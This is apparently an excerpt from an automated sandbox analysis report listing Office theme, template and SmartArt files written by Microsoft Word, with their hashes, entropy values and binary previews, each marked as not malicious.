                                                                                      Entropy (8bit):3.528155916440219
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                                                      MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                                                      SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                                                      SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                                                      SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):2218943
                                                                                      Entropy (8bit):7.942378408801199
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                      MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                      SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                      SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                      SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):278
                                                                                      Entropy (8bit):3.544065206514744
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                                                      MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                                                      SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                                                      SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                                                      SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):2357051
                                                                                      Entropy (8bit):7.929430745829162
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                      MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                      SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                      SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                      SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):276
                                                                                      Entropy (8bit):3.516423078177173
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                                                      MD5:5402138088A9CF0993C08A0CA81287B8
                                                                                      SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                                                      SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                                                      SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):3078052
                                                                                      Entropy (8bit):7.954129852655753
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                      MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                      SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                      SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                      SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                      Malicious:false
                                                                                      Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):274
                                                                                      Entropy (8bit):3.5303110391598502
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                                                      MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                                                      SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                                                      SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                                                      SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):2924237
                                                                                      Entropy (8bit):7.970803022812704
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                      MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                      SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                      SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                      SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):286
                                                                                      Entropy (8bit):3.5434534344080606
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                                                      MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                                                      SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                                                      SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                                                      SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):3611324
                                                                                      Entropy (8bit):7.965784120725206
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                      MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                      SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                      SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                      SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):288
                                                                                      Entropy (8bit):3.5359188337181853
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                                                      MD5:0FEA64606C519B78B7A52639FEA11492
                                                                                      SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                                                      SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                                                      SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):274
                                                                                      Entropy (8bit):3.4699940532942914
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                                                                      MD5:55BA5B2974A072B131249FD9FD42EB91
                                                                                      SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                                                      SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                                                      SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Word 2007+
                                                                                      Category:dropped
                                                                                      Size (bytes):3465076
                                                                                      Entropy (8bit):7.898517227646252
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                      MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                      SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                      SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                      SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                      Malicious:false
                                                                                      Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):252
                                                                                      Entropy (8bit):3.4680595384446202
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                                                      MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                                                      SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                                                      SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                                                      SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):5783
                                                                                      Entropy (8bit):7.88616857639663
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                      MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                      SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                      SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                      SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                      Malicious:false
                                                                                      Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):4026
                                                                                      Entropy (8bit):7.809492693601857
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                      MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                      SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                      SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                      SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                      Malicious:false
                                                                                      Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):250
                                                                                      Entropy (8bit):3.4916022431157345
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                                                      MD5:1A314B08BB9194A41E3794EF54017811
                                                                                      SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                                                      SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                                                      SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):314
                                                                                      Entropy (8bit):3.5230842510951934
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                      MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                                                      SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                                                      SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                                                      SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                                                      Malicious:false
